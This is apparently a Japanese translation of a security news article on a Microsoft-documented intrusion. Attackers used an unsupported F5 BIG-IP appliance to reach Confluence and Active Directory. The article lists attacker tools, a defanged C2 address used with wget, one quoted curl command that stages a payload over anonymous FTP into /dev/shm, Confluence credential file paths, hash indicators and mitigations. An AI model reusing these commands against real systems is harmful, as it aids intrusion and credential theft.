脅威アクターは、サポートが終了したF5 BIG-IPアプライアンスを積極的に悪用して、エンタープライズネットワークへの不正なSSHアクセスを獲得し、侵害されたデバイスを高度なマルチステージの侵入キャンペーンの足がかりとして使用し、最終的にActive Directory インフラストラクチャを標的にしています。
Microsoft脅威インテリジェンスは2026年5月22日に完全な攻撃チェーンを公開し、単一の侵害されたエッジアプライアンスがLinuxホスト、内部のAtlassian Confluenceサーバー、およびWindows認証システムにまたがるドメインレベルの侵害にいかにカスケードしたかを記録しています。
記録されたインシデントでは、調査官は脅威アクターの初期SSHアクセスをAzureホストのF5 BIG-IP Virtual Edition(VE)バージョン15.1.201000にトレースしました。これはAzure ARMテンプレートとTerraformモジュール経由で一般的にプロビジョニングされるクラウドデプロイメントビルドです。
この特定のバージョンは2024年12月31日にサポート終了(EOL)となり、侵害時点ではパッチが適用されておらず、サポートされていない状態にありました。
SSHアクセスを獲得するF5 BIG-IP
タイミングはより広いF5脅威環境と直接一致します。2025年8月、高度な国家レベルの脅威アクターがF5の内部システムに侵入し、BIG-IPプロダクトソースコードとともに未公開の未パッチ脆弱性の詳細を流出させました。
F5が2025年10月に公開した当該侵害は、BRICKSTORMマルウェアファミリーにリンクされており、ソースコードと認証情報を収集してサプライチェーンの下流搾取を目的としたソフトウェアおよびクラウドベンダーを標的としたキャンペーンに関連しています。
リスクをさらに悪化させているのは、CVE-2025-53521、F5 BIG-IP Access Policy Manager(APM)の重大な欠陥です。これはもともと2025年10月にサービス拒否(DoS)バグとして開示されていましたが、2026年3月にCVSS スコア9.8のリモートコード実行(RCE)脆弱性として再分類されました。
CISAは2026年3月27日にCVE-2025-53521を既知悪用脆弱性(KEV)カタログに追加し、Shadowserver Foundationはその時点で世界中の17,000以上の脆弱なIPを報告しました。オランダ国家サイバーセキュリティセンターもまた、この脆弱性の野生での能動的な悪用を独立して確認しました。
侵害されたF5アプライアンス経由でSSHアクセスが確立されると、脅威アクターは無制限のsudo権を持つ特権アカウントを使用して認証を行い、明示的な永続性メカニズムを展開せずに侵入全体を通じてハンズオンキーボードアクセスを維持しました。
攻撃者は、階層化されたツールキットを使用して積極的な偵察をすぐに開始しました:
- 内部サブネット全体で水平および垂直ネットワークスキャンを行うための自動シェルスクリプト付きNmap
- 発見されたすべてのHTTP/HTTPSサービスをスクリーンキャプチャするGoWitness
- SSL/TLSの弱点をプローブしプロトコルダウングレードパスを特定するためのtestssl
206.189.27[.]39:8888からwget経由でダウンロードされたHackTool:Linux/MalPack.Bとして検出されたカスタムELFバイナリ。Webアプリケーションアクセス制御を列挙するために使用されました
Windows インフラストラクチャに対するenum4linux、kerbrute、responder、smbclient、netexecを含む標準的なNTLMベースの横方向移動ツールの使用の試みは、最初のうちは失敗していました。
偵察中、脅威アクターは未パッチのリモートコード実行脆弱性を持つ内部でホストされているAtlassian Confluenceサーバーを特定しました。
Microsoftは、サーバーがインターネット向けではなく、攻撃者が内部ネットワークアクセスを獲得した後にのみ到達可能になったと述べており、これはハイブリッド環境とクラウド環境での重要なリスクです。サービス間に暗黙的な信頼境界が存在します。
Confluenceホストのリアルタイム保護(RTP)が直接ペイロード配信をブロックした場合、脅威アクターは、初期Linuxホスト上にPython FTPサーバーを設置し、匿名FTPを使用してペイロードをステージングして転送することで適応しました:
bashcurl -o /dev/shm/ag ftp://anonymous:anonymous@[REDACTED_LOCAL_IP]/5
Confluenceを侵害した後、攻撃者は/opt/atlassian/confluence/conf/server.xmlとconfluence.cfg.xmlから認証情報を抽出し、それらをドメインインフラストラクチャに対するKerberosリレー攻撃に活用しました。
これには、2025年6月にRedTeam PentestingとSynacktivの研究者によって開示されたCVE-2025-33073、Windows SMB NTLMリフレクション脆弱性の悪用が含まれていました。
CVE-2025-33073は、管理者アクセスの前提条件を削除し、SMB署名が強制されていないドメイン参加マシンで任意の有効なドメイン認証情報のみが必要な、SYSTEMとして認証されたRCEを達成することができます。
| 指標 | タイプ | 説明 |
|---|---|---|
4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465 |
SHA-256 ファイルハッシュ | カスタムスキャンツール(HackTool:Linux/MalPack.B) |
b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216 |
SHA-256 ファイルハッシュ | Nmapネットワークスキャンを自動化するシェルスクリプト |
710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a |
SHA-256 ファイルハッシュ | Kerbruteツール(HackTool:Linux/Kerbrute!rfn) |
57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517 |
SHA-256 ファイルハッシュ | gowitness HTTP/HTTPSスクリーンショットスキャナー |
bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455 |
SHA-256 ファイルハッシュ | NTLMリレーPythonスクリプト(CVE-2025-33073悪用) |
206.189.27[.]39 |
IPv4アドレス(Defanged) | C2サーバーポート8888でのペイロード配信 |
注記:IPアドレスとドメインは意図的に難読化されており(例:[.])、意図しない解決またはハイパーリンクを防止します。MISP、VirusTotal、またはSIEMなどの制御された脅威インテリジェンスプラットフォーム内でのみ再Fangしてください。
対策
- EOLアプライアンスを直ちに廃止し、インターネット向けのエッジデバイスをTier-0資産として扱い、厳密なライフサイクルガバナンスを実施する
- Confluenceなどの内部アプリケーションをインターネット公開サービスと同じ緊急性でパッチします。
- NTLMを無効化または最小化し、SMB署名を強制し、LDAP署名とチャネルバインディングを有効化してリレー攻撃をブロックする
- すべてのLinuxサーバーでMicrosoft Defender for Endpointをブロックモードで一貫して有効化する。
- 階層化された管理モデルを実装し、単一アプリケーション認証情報の盗難がドメインコントローラーに到達するのを防止する
Google News、LinkedIn、Xでフォローして即座の更新を受け取り、GBHをGoogleの優先ソースとして設定してください。
翻訳元: https://gbhackers.com/exploit-f5-big-ip-ssh-access/
